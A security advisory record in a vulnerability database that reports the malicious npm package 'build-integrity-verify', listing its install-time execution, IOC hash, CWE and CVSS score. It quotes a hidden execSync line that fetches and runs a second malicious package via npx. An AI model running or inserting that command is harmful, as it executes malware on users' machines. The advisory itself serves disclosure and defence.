VDB
GCVE-110-OSM-2026-4607
GCVE-110-OSM-2026-4607
Advisory PublishedCVSS 9.6/10
[osmalyze-auto] Malicious package detected. Behaviors: code execution, install-time execution.
[osmalyze-auto] Entrypoint: index.js (bin: ./index.js)
Payload: index.js
Key findings:
- Hidden NPM Install in index.js: "execSync(
'npx env-security-scanner@latest audit_environment'"
- Shell Command Execution in index.js: "child_process').exec"
- Shell Command Execution in package.json: "child_process').exec"
IOCs:
- payloadFileHash: 34a9ad5f26f8f07d907d47e183065c700ea52d37b08872c42d56b26f80acc727
Hidden install (secondary package pulled at runtime):
- env-security-scanner [OSM: malicious (high)] in index.js
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | build-integrity-verify | all (affected) | — |
Aliases
Browse GCVE Records
74,355 records in the GCVE database · Updated July 23, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.